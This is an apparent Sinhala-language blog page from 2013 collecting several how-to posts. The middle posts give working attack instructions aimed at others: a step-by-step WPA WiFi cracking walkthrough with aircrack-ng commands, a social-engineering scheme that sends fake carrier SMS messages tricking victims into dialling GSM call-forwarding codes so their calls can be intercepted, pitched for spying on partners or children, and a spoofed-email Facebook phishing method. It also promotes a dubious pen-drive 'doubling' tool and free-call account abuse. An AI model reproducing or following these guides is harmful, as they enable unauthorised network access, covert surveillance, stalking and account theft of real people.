Monday, September 30, 2013

ඔබට කැමති English වචනයක් ලගට mouse point එක ගෙනගිය විට එහි තේරුම පෙන්වන..

ඔබට කැමති English වචනයක් ලගට mouse point එක ගෙනගිය විට එහි තේරුම පෙන්වන..



                      
                                  අදවන විට ඉන්තර්ජාලය අපට නැවතුම බැරි දෙයක් වී ඇත. අන්තර්ජාලයේ සැරිසරන අපට බොහෝ English වචන අපට හම්බ වෙනවා. සමහර බොහෝ දුරට එම වචන වල තේරුම නොදන්නා වචනද අපට අනන්තවත් හමුවෙනවා. එම වචනයේ තේරුම දැනගැනීමට අවශ්‍ය නම් බොහෝ දෙනා කරන්න මදුර වැනි English සිංහල ඩික්ෂනේරිය භාවිතාකර එහි තේරුම ලබා . එහෙත් ඊට වඩා බොහෝ පහසු ක්‍රමයක් මේවනවිට ඇත. මෙය තමා වෙබ් බ්‍රොව්සර් එකටම ඩික්ෂනේරිය install කරගැනීම. එමගින් අපට තේරුම අවශ්‍ය English වචනය ලදට mouse point එක ගෙන ගිය විට ඊට පහලින් එම වචනයට ආසන්නතම තේරුම ලබා දේ. 


                 ඇත්තම කිව්වොත් මේක මට කිව්වේ මගේ යාලුවෙක්. ඉතින් මම හිතුවා ඔයාලටත් කියන්න ඕනේ කියලා.මම හිතන්නේ මේක හොයාගන්න ඇත්තේ ලංකාවේ කෙනෙක් මම හරියටම දන්නේ නැ කවුද කියා. කවුරු උනත් වටිනා දෙයක් තමා දීලා තියන්නේ. මමත් ස්තුති වනත් වෙනවා.

download

වයිෆයි හැක් කරමු

වයිෆයි හැක් කරමු


 

 වයිෆයි  (WiFi) ගැන ඔයාලා දන්නවනේ නේද?  WiFi කියන්නෙ වයර් රහිතව කරන සංන්නිවේදන කටයුත්තකට. ( Wireless Fidelity, wireless internet) ඉතින් මේ ආකාරයට  වයර් රහිතව  සංන්නිවේදන කටයුතු කරන්නේ පහසුවට.  වයර්  එක්ක වැඩ කරන්න අපහසු හින්දා. ඉතින් ඒ ආකාරයට වැඩකරන ස්තානයකට අපි කියනවා WiFi Hotspot එකක් කියලා.  WiFi Hotspot එකක වෙබ් අඩවි තහනම් කිරීමක් බාගන්න තියන වේගය අඩාල කිරීමක් වගේ දේවල් සිද්දවෙන්නෙ නේ. ඒ කියන්නෙ  WiFi Hotspot  එකකදී අන්තර්ජාලය පුල් නිදහස් කියන එක.  ඉතින් මේ  WiFi Hotspot  ජාලකරන තලමිතීන් අනුව ආරක්ශිතව හදලයි තියෙන්නේ. ඒ කියන්නෙ මුරපද දාල වගේ.  ඉතින් අද කියන්න යන්නේ කොහොමද මේ මුරපද බිදගෙන  WiFi Hotspot  එකක් ඇතුලට යන්නෙ කියලා


මේ වැඩේ කරන්න පහල දේවල් ඕනේ

1. Linux Backtrack 5 RC2 ( ඔයාල භාවිතා කරන පරිගනකයේ ඕස් එකට අදාල වර්ශන් එක බාගන්න)

2 හොදට වැඩ කරන wireless කාඩ් එකක්

3. දැනට බාවිතා වෙන පාස්වර්ඩ් ලිස්ට් එකක්. මේක නම් ගූගල් වලින් හොයාගන්න පුලුවන්. ටිකක් කම්මැලි නම් මෙන්න තියනවා පාස්වර්ඩ් 1717681 ම. 




ඉතින් Linux Backtrack 5 RC මෙතනින් බාගන්න.
හරි, මන් හිතන්නේ ඔයාලා දැන් Linux Backtrack 5 RC2 බාගෙන සීඩී එකකට ගහගෙන එහෙම ඇති කියලා. ඊලගට පරිගනකය ඒ සීඩී එකෙන් බූට් කරන්න. ලිනක්ස් ගැන ටිකක් දැනගෙන ඉන්න නම් ඕනේ. කමක් නෑ දන්නේ නැත්නම් මං ස්ක්‍රීන් සොට්ස් ටිකක් දාන්නම්.

පලමු පියවර 



මුලින්ම root@bt:~# කියන තැනට airmon-ng කියන විදානය බාවිතා කලාම ඉහල රූපයේ ආකාරයට දැනට තියන WiFi නෙට්වර්ක් මොනවද කියලා පෙන්නනවා 

මෙතන පෙන්නන wlan0 කියන WiFi නෙට්වර්ක්  එක උපකාර කරගෙනයි මම ඉස්සරහට හැමදේම කියන්නෙ. ඉතින් ඔයාලා wlan0 වෙනුවට භාවිතා කරන්න ඕනේ ඔයාලට හැක් කරන්න් ඕනේ WiFi නෙට්වර්ක්  එකේ නම 
 

දෙවන පියවර 

airmon-ng start wlan0
කියන විදානය ලබා දෙන්න. මේකෙන් අපි බලන්නේ අපිට හැක් කරන්න ඕනේ WiFi නෙට්වර්ක් එක ක්‍රියාකාරී තත්වයෙන් තියනවද කියල.

තුන්වන පියවර 

මෙතනදි අපි ifconfig කියන විදානය ලබා දෙනවා. එතනදි අපිට පහල ආකාරයට හැක් කරන්න ඕනේ WiFi නෙට්වර්ක් එකේ තොරතුරු බලගන්න පුලුවන්.




හතරවන පියවර 
මෙතනදි කරන්න බලපොරොත්තු වෙන්නෙ හැක් කරන්න ඕනේ WiFi නෙට්වර්ක් එකේ මැක් ඇඩ්ර්ස් එක වෙනස් කරන්න. පහල විදානය බාවිතා කරන්න.

macchanger –m 00:11:22:33:44:55 wlan0
 

පස්වන පියවර 
මෙතනදි අපි කරන්නෙ අලුත් කරපු මැක් ඇඩ්ර්ස් එක නිවැරදි ආකාරයෙන් වැඩ කරනවද කියන එක බලන එක. ඒකට පහත විදානය බාවිත කරන්න පුලුවන්. 
 
airodump-ng mon0


හයවන පියවර 
 
ඊලගට අපිට බලගන්න පුලුවන් අපි හැක් කරන්න යන WiFi නෙට්වර්ක් එකේ නියම නම. SSID එක. රතුපාටින් දාල තියෙන්නෙ ඒක. ඊට පස්සෙ අපිට් පුලුවන් අපි හැක් කරන්න් යන WiFi නෙට්වර්ක් එකට මේ වෙනකොට ලොග් වෙල් ඉන්න් කෙනෙක්ව හොයගන්න. ඒකට පහල විදානය දෙන්න. 
 
airodump-ng –c 6 –w crackwpa –bssid 02:1A:11:FE:A4:CE

 
කොල පාටින් තියෙන්නෙ ඒ වගෙ ලොග් වෙලා ඉන්න කෙනෙක්ගේ මැක් එකක්. 

හත්වන පියවර 
ඊලගට කරන්න ඕනේ දැනට ලොග්වෙල ඉන්න කෙනා එක්ක පොඩි handshake දාගන්න  ඒකට පහල විදානය දෙන්න. 
 
aireplay-ng –0 –4 –a MAC-ADDR-OF-ROUTER –c MAC-ADDR-OF-CLIENT mon0



මේ විදානය දුන්නට පස්සෙ ඉහල රූපයේ පෙනෙන ආකරයට විදානයන් ක්‍රියත්මක වෙයි.

අටවන පියවර 
ඊට පස්සෙ අපිට පුලුවන් දැනට ලොග් වෙල් ඉන්න කෙනාගේ උදවුවෙන් ලොග් වෙල ඉන්න  WiFi නෙට්වර්ක් එකේ  පාස්කී එක ලබා ගන්න.  ඒකට පහල විදානය දෙන්න. 

aircrack-ng crackwpa-01.cap –w list



මෙතන් list කියන තැනට අපි අර බාගත්ත පාස්වර්ඩ් ලිස්ට් එකේ පාත්  එක දෙන්න ඕනේ. 
ඉතින් ඔන්න කොල පාටින් දක්වලා තියන ආකාරයට අපිට හැක් කරන්න ඕනේ  WiFi නෙට්වර්ක් එකේ  පාස්කී එක පෙන්නනවා. දැන් ඉතින් අපිට පුලුවන් ඒ පාස් කී එක බාවිතා කරල අපිට ඕනේ විදියට නෙට්වර්ක්  එකා බාවිතා කරන්න 
 

free calls අන්තර්ජාලයෙන් නොමිලේ ඇමතුම් මොබයිල් ෆෝන් වලට...

free calls අන්තර්ජාලයෙන් නොමිලේ ඇමතුම් මොබයිල් ෆෝන් වලට...

go to
ආසයිනේ නොමිලේ ඇමතුම් ගන්න. නොමිලේ දෙනවා නම් ඉතින්... මෙන්න ඒනම් අන්තර්ජාලයෙන් නොමිලේ ඇමතුම් ගන්න පුලුවන් ක්‍රම කිහිපයක්. මේව ඉතින් අන්ලිමිටඩ් කෝල්ස් නෙමේ හරිද?
 මම දැන් වෙබ් අඩවි ටිකක් කියන්නම්.  හරි ඒ නම් පටන්ගමු.

Evaphone

 
go to this site click here මේ සයිට් එකට ගිහින් රෙජිස්ටර් වෙන්න. දවසකට ඕනෙම් රටකට 2  කොල් ගන්න පුලුවන්. වැරදිලා වටහ ගන්න එපා. දවසට කෝල් 2යි. ඒ වගේම එක එක රටවලට එක එක ප්‍රමාණයේ ෆ්‍රී මිනිට් තියනවා. ගිහිල්ලම බලන්නකෝ. කෝල් ගන්න කොට මයික්‍රපෝන් එක ඔන් කරල අලෝ කරන්න.

කෝල් ගන්න කලින් රෙජිස්ටර් වෙන්න වෙනවා. රෙජිස්ටර් වෙන එක ලේසි.. ඕනෙනම් අයිපී එහෙම මාරු කරල අකවුන්ට් කිහිපයක් එහෙම හදගෙන වැඩියෙන් කතා කරන්න. ඒක ඔයගොල්ලන්ගේ දස්කම....

Volium

go >> to volium.com << Click

මේකෙ මුලින්ම අපි රෙජිස්ටර් වෙන්න ඕනේ. ඊට පස්සේ අපිට ඕනෙම රටකට විනාඩි 5ක් නොමිලේ ඇමතුම් ගන්න පුලුවන්.එක අකවුන්ට් එකක් රෙජිස්ටර් වීමෙන් ලෙබෙන්නේ විනාඩි 5ක් පමණි.  ඕනෙනම් ඊමෙල් 5ක් විතර හදල මාට්ටු නොවෙන්න විනාඩි 25ක් කතාකරන්න. ඒක ඔයාලගේ දස්කම්.


දන්නා නොදන්නා ඕනෑම කෙනෙකුගේ දුරකතන ඇමතුම් Hack කරන්නෙ මෙහෙමයි. [ Telephone Call Hacking ]

දන්නා නොදන්නා ඕනෑම කෙනෙකුගේ දුරකතන ඇමතුම් Hack කරන්නෙ මෙහෙමයි. [ Telephone Call Hacking ]

 
 
දන්නා නොදන්නා ඕනෑම අයෙකුගේ ජංගම දුරකතන අංකය ආශ්‍රයෙන් ඒ ඒ පුද්ගලයින්ගේ දුරකතන ඇමතුම් වලට සවන් දියහැකි ක්‍රමවේදයකි.


  • ආයුබෝවන් යාලුවෝ හැමදෙනාටම.කලබල නැතුව මුල ඉඳලා අගට යනකන්ම මේක කියවලාම වැඩේට බහින්න.ඉතින් මම මේ ඔයාලට කියලා දෙන්න යන්නෙ කොහොමද කෙනෙක්ගෙ දුරකතන අංකය භාවිතා කරලා ඒ කෙනාගෙ දුරකතන ඇමතුම් වලට සවන් දෙන්නෙ කියලා.මම මේ දේ කියල දෙන්න යන්නෙ කාටවත් නරකක් කරන්න නෙවෙයි.තමන් ආදරය කරන කෙනා තව කෙනෙක් එක්ක Phone එකෙන් කතා කරනවද කියලා සැකනම්, තමන්ගෙ දුව-පුතා කවුරු එක්කද Phone එකෙන් කතා කරන්නෙ කියලා දැනගන්න ඕනිනම් ඒ දේවල් දැනගන්න.ඒක නිසා මේ දේ කවුරුවත් වැරදි විදියට පාවිච්චි කරන එකක් නැහැ කියල මම බලාපොරොත්තු වෙනවා.මම මේ දේවල් පිලිබඳ කිසිඳු වගකීමක් බාරනොගන්නා බවද කියන්න කැමතියි.


---අපි වැඩේ පටන්ගමු.---


හැඳින්වීම :

  •  ඕනෑම කෙනෙකුට මෙය අත්හදා බැලිය හැක.එනම් පහසු ක්‍රියාවලියකි.

  •  SMS පහසුකම සහිත ඕනෑම දුරකතනයක් මෙම ක්‍රමයෙන්  Hack කිරීමට පුලුවන්.(සමහර ලංකාබෙල්, සිටිලින්ක් දුරකතන හැර...)

  •  (Phishing හා සමාන ක්‍රමවේදයකි.)


අවශ්‍යය දේවල් :


  • අලුත්ම Gmail Account එකක්
      (උදා :- dialoglanka@gmail.com , srilankamobitel@gmail.com වගේ එකක්.ඒක ඔයාලා Hack කරන්න යන කෙනාගෙ ජංගම දුරකතන ජාලය අනුව,ඊට උචිත නමකින් හදාගන්න..)


  • අලුත්ම සිම් කාඩ් පතක්(සිම් එක ගන්න ඕනෙ Hack කරන්න යන කෙනාගෙ ජංගම දුරකතන ජාලයේ සිම් එකක්මයි)


ඔක්කොම දේවල් දැන් අපි ලෑස්ති කරගෙන තමයි තියෙන්නෙ.

මම දැන් පියවරෙන් පියවර කියල දෙන්නම්.


  • ඉස්සෙල්ලම ඔයා හදපු Gmail Account එකට Log වෙන්න.


  • ඊට පස්සෙ ඔයා Hack කරන්න යන කෙනාගෙ Phone Number එක Contact List එකට දාගන්න.


  •  දැන් ඒ කෙනාට SMS යවන Window එක Open කරගෙන මේ පහලින් පෙන්නලා තියන විදියට මොනව හරි Type කරගන්න


උදා :-

 @dialog.adata niyamitha 
apage sanwathsarika
semarum hethuwen
"30mins" kaalayak onema jalayakata
amathum nomile labadheemata
api katayuthu yodha athi bawa
sathutin danwamu.me sandaha 
pahatha keathaya amathaa liyaapadinchi wanna


"*******************"

 ____________________

 දැන් මම ඔය තරු ටිකක් දාල තියන තැන Type කරන්න තියනවා GSM කේතමය අංකයක්.පහල තියන අංක 4න් ඕනෑම අංකයක් එතනට දාන්න පුලුවන්.එතකොට වෙන දේවල් ටිකත් මම ඒ එක්කම දාල ඇති.ඒක බලපුවහම කට්ටියට තේරෙයි මොකද වෙල තියෙන්නෙ කියලා.


මම "X" දාලා තියන තැන් වලට ඔයාලා අරගත්ත සිම් එකේ Number එක ලියන්න.
 

DOWNLOAD GSM CODES  click here
 
 
 **62*XXXXXXXXXX#
 
මේ අංකය දැම්මොත් ඒ කෙනා Phone එක OFF කරපුවහමයි, Signal නැති වෙලාවටයි එයාගෙ Phone එකට එන සේරම calls එන්නෙ ඔයා අර දාපු Number එකට.
[මෙය අක්‍රීය කිරීමටනම් එම දුරකතනයෙන්ම #62# යන GSM Code Number එක Dial කල යුතුය.ඔබට අවශ්‍යයනම් එම දුරකතනය වෙත යවන SMS තුලටම මෙය අවශ්‍යය පරිදි යොදා ගත හැක.]



  **61*XXXXXXXXXX#
 
මේ අංකය දැම්මොත් ඒ කෙනා Phone එක Answer කරන්නෙ නැති වෙලාවට ඒ Calls සේරම එන්නෙ ඔයා අර දාපු Number එකට.
[මෙය අක්‍රීය කිරීමටනම් එම දුරකතනයෙන්ම #61# යන GSM Code Number එක Dial කල යුතුය.ඔබට අවශ්‍යයනම් එම දුරකතනය වෙත යවන SMS තුලටම මෙය අවශ්‍යය පරිදි යොදා ගත හැක.]


  **67*XXXXXXXXXX#
 
මේ අංකය දැම්මොත් ඒ කෙනා Call එකක ඉන්න වෙලාවට ඒ Calls සේරම එන්නෙ ඔයා අර දාපු Number එකට.
[මෙය අක්‍රීය කිරීමටනම් එම දුරකතනයෙන්ම #67# යන GSM Code Number එක Dial කල යුතුය.ඔබට අවශ්‍යයනම් එම දුරකතනය වෙත යවන SMS තුලටම මෙය අවශ්‍යය පරිදි යොදා ගත හැක.]


  **21*XXXXXXXXXX#
 
මේක දැම්මොත් ඒ කෙනාට එන සේරම Calls එන්නෙ ඔයා අර දාපු Number එකට.
හැබැයි මේකනම් එච්චර සාර්ථක නැහැ.පටස් ගාලා අහුවෙන්න පුලුවන්.ඔයාලටම තෙරෙයි ඒ ඇයි කියලා.
[මෙය අක්‍රීය කිරීමටනම් එම දුරකතනයෙන්ම #21# යන GSM Code Number එක Dial කල යුතුය.ඔබට අවශ්‍යයනම් එම දුරකතනය වෙත යවන SMS තුලටම මෙය අවශ්‍යය පරිදි යොදා ගත හැක.]


Number එක මෙන්න මේ විදියට දාන්න මතක තියා ගන්න.වෙන වෙන විදියට ගහන්න එපා.

 උදා :-
 
"0712345678"


දැන් මේ SMS එක ඒ කෙනාට යවන්න.ඒ කෙනා මේ GSM Code Number එක Dial කරපු සැනින් ඔයා යවපු  Code Number එකේ හැටියට සේරම Calls හැරෙනවා.මේක හැම Phone එකකටම වෙනසක් නැතුව වැඩ කරනවා.ඕනෙම Phone එකකට.


මේක සාමාන්‍යය Phone එකකිනුත් කරන්න පුලුවන්.ඒත් එහෙම සාමාන්‍යය Number එකකින් SMS එකක් ආවට ඒක කවුරුවත් ගනන් ගන්නෙ නැහැ.ඒක නිසයි අපි Gmail Use කලේ.එතකොට SMS එක යන්නෙ "12323" වගෙ අංක 5ක Number එකකින්.ඒ වගෙම අපි අලුතින් Gmail Account එකක් හැදුවෙ අපේ Gmail Address එකත් SMS එකේ යටින් වැටෙන නිසා.

එහෙනම් යාලුවෝ හැමෝම මේක Try කරල බලන්න.
කාටවත් නරකක් කරන්න නෙවෙයි.යමක් ඉගෙනගන්න.


1GB Pen Drive එක 2GB කරමුද - 1GB to 2GB

1GB Pen Drive එක 2GB කරමුද -  1GB to 2GB

 

 

 



යාළුවනේ මේකනම් පට්ටම වැඩ කැල්ලක් අපේ 1GB Pen එක මේ Software එකෙන් 2GB කරගන්න පුලුවන්.මේකෙ වෙන සිද්දියනම් මටත් තෙරෙන්නේ නෑ හැබයි කිසිම අවුලක් නෑ මම මගේ Phone එකේ තිබ්බ Memory Chip එකටත් කරල බැලුවා.ඕනම දේකට මේක කරන්න පුලුවන්.
මේක කරන හැටි මම ඔයාලට කියලා දෙන්නම් මුලින්ම පල්ලෙහා Link එකෙන් Software එක Download කරගන්න Mb එකවත් නෑ පොඩිම පොඩි Software එකක්.හැබැයි වෙන වැඩේනම් කෝටියක් වටිනවා 

Software එක Install කරගත්තාට පස්සේ ඔයාලගේ Pen එක හරි Chip එක හරි PC එකට Plug කරන්න 
දැන් Software එක ඇතුලෙන් Pen එක පෙන්නයි.මෙන්න මේ වගේ 
 
 
මේ මගේ 1 GB chip එක හොදේ 

ඊට පස්සෙ Fix කියන එක ඔබන්න එතකොට මෙහෙම එකක එයි එක OK කරන්න.ඔයාලාට වැදගත් Data Pen එකේ තියනවානම් මේක කරන්න ක්ලින් ඒවා Backup කරගන්න 
 
 

ඊට පස්සෙ ඔයාලාට මේවගේ Massage එකක් එයි ඒ කියන්නේ වැඩේ හරි කියන එක ඕකත් OK කරන්න 
 
 

ඊට පස්සෙ මෙහෙම Massage එකක එනවා Pen එක අයෙත් Plug කරන්න කියලා,එතකොට PEN එක ගලවලා අයෙත් Pc එකට plug කරන්න 
 
 
 
බලන්න කොහොමද වැඩේ Pen එක 2GB වෙලානේ.හැබයි මේක කරන්න පුලුවන් 1GB එවාට විතරයි.එහෙනම් ඔයාලත් කරලාම බලන්නකෝ මම යනවා ආයෙත් අලුත් දෙයක් අරගෙන එන්නම්....ඔයාලා යනකොට පොඩි Like එකකුයි Comment එකකුයි දාලා යන්න හොදේ............. :) 



මෙතනින් ගන්න 
Download

Hacking Facebook

Hacking Facebook

                      
හැමෝගෙම සිහිනයක් තමයි fb එක හැක් කරන එක. ඉතින් එක් එක්කෙනා එක එක ආකාරයේ ක්‍රම සොයගෙන තියනවා මේ වැඩේ කරන්න.  පේස්බුක් මෑතක් වෙනතුරුම ආරක්ශාව සම්න්දයෙන් ඒ තරම් උනන්දුවක් දක්වපු වෙබ් අඩවියක් නෙමෙයි. නමුත් ලෝකයෙන් ආපු එක එක චෝදනා නිසා අද වෙනකොට  ආරක්ශාව අතින්  පේස්බුක්  ටිකක් ඉදිරියට ඇවිත්,

 හරි, මන් මේ කියන්න යන්නේ පේස්බුක් සර්වර් එක හැක් කරන ආකරයක් නම් නෙමෙයි. කාගේ හරි පේස්බුක්  ගිනුමක් හැක් කරන් ආකාරය. අපිට මේකට පොඩි සොෆ්ට්වෙයා එකක් හොයගන්න වෙනවා එකෙන් කරන්න ඕනේ වෙන කෙනෙක් යවන ආකරයට අපි මේල් එකක් යවන එක. ඒ කියන්නෙ  පේස්බුක් එකෙන් යවන විදියට අපිට හැක් කරන්න ඕනේ කෙනාගේ ගිනුමට අපි මේල් එකක් යවනව.. 
මේ වෙබ් පිටුවට යන්න මුලින්ම 
දැන් මේ පහල තියන රූපය හොදින්  කියවල බලන්න.. අපි ලියන මැසේජ් එක බලන කෙනාව නොමග යවන ආකරයටයි ලියවෙන්න ඕනේ. 
 
 
හරි, ඉතින් මේ ඊමේල් එක ලැබුනාම කෙනෙක් එයගේ පාස්වර්ඩ් එක මාරු කරගෙන නම් අපිට කිසි අවුලක් නැතිවම ඒ ගිනුමට ලොග් වෙන්න පුලුවන්.


something fresh +PSD for Window 7 - Skins & Themes / Windows 7 Utilities / Visual Styles 7

something fresh +PSD for Window 7 - Skins & Themes / Windows 7 Utilities / Visual Styles 7




Download